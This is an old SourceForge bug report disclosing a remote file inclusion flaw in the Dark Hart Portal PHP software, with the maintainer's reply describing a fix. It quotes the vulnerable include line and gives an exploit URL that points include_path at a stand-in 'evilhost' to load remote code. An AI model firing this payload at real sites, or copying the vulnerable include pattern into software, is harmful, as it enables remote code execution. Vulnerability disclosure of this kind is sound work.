Dark Hart Portal

Tracker: Bugs

9 serious security flaws - ID: 440666

Last Update: Comment added ( webmosher )

Details:

e.g., login.php contains the following line:
include("$include_path/plugins/$plugin/function.php");

The $include_path can be set by anyone:
http://foo/login.php?mainfile=1&include_path=http://evilhost/

This exploit works on the demo site.

Submitted:

Nobody/Anonymous ( nobody ) - 2001-07-12 13:35

Priority:

Status:

Closed

Resolution:

Later

Assigned:

Fred Hirsch

Category:

Core Features

Group:

Alpha Development

Visibility:

Public

Comment ( 1 )

Date: 2001-07-16 13:12 Sender: webmosher Logged In: YES user_id=157247 Thanks for finding this issue. I am working on this right now. It seems to be an artifact of using the old PHPNuke system of including the primary function library. Fix will be to use include_once and remove the mainfile variable. I will also explicitly unset any variables that are utilized globally in the primary methods.

Log in to comment.

Attached File

Changes ( 7 )

Field	Old Value	Date	By
status_id	Open	2001-07-16 13:12	webmosher
resolution_id	None	2001-07-16 13:12	webmosher
category_id	None	2001-07-16 13:12	webmosher
artifact_group_id	None	2001-07-16 13:12	webmosher
priority	5	2001-07-16 13:12	webmosher
assigned_to	nobody	2001-07-16 13:12	webmosher
close_date	-	2001-07-16 13:12	webmosher

Dark Hart Portal

Tracker: Bugs

Comment ( 1 )

Log in to comment.

Attached File

No Files Currently Attached

Changes ( 7 )

About SourceForge

Find Software

Develop Software

Community

Help